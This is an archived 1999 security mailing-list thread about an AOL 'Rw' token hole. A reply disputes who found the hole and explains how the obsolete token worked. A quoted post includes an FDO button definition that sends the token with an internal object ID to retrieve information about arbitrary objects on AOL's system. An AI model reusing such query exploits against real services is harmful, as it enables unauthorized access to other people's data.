Re: America Online Token Hole

From: Zero Divide (o0oat_private)
Date: Wed Jul 14 1999 - 22:47:33 PDT

    Programmable AOL buttons are written in FDO(Form Display
    Operation).  You can compile these forms using AOL's Visual
    Publisher Designer tool.

    As for this Rw token nonsense.  The Rw token exploit was
    discovered in early 1998 by Slushie and Uaert, not by this
    Mackk person.  I don't know who he is or why he even
    brought up this exploit on Bug traq.

    The Rw token was used when AOL accounts with Rainman
    publishing rights had access to two or more Rainman
    Groups.  Since objects could have the same external ID and
    be in different Rainman Groups, AOL designed the Rw token
    to allow you to choose the particular Rainman Group you
    wanted the EOI feedback displayed from.  After AOL patched
    the Rw in early 1998, Rainman users were no longer able to
    get a list of all the objects using the same external ID.
    Instead they had to type in the Rainman group AND the
    external ID in order to view the EOI feedback i.e "1928.tos
    blah"

    I fail to see why the Rw token would still work in this one
    hour time slot because the function it performs is now
    obsolete.  Of course, this is AOL we are talking about and
    they are not known for running the most efficient and
    secure service.

    ZD
    <<<I had contacted the person who posted this information.
    It seems that AOL has contacted him and he refuses to talk
    about this if you ask about it.

    Does anyone have any information on how to make your own
    programmable buttons for aol?

    granny

    About a year ago, I found out that by sending the "Rw"
    token
    to the AOL host while signed on along with the object's
    internal id as arg, any user could get detailed info about
    any object on the system.

    man_start_object < trigger, "" >
    mat_relative_tag < 22 >
    act_replace_select_action
    <
    uni_start_stream
    sm_send_token_arg <"Rw", INTERNAL ID HERE>
    uni_end_stream
    <FONT COLOR="#222255">> </FONT>
    mat_precise_x < 0 >
    mat_precise_y < 226 >
    mat_font_sis < small_fonts, 7, normal>
    mat_art_id < 1-0-21184 >
    mat_bool_default < yes >
    man_end_object

    comments questions..   <A
    HREF="mailto:<A
    HREF="mailto:mackkat_private">mackkat_private</A>"><A
    HREF="mailto:mackkat_private">mackkat_private</A></A>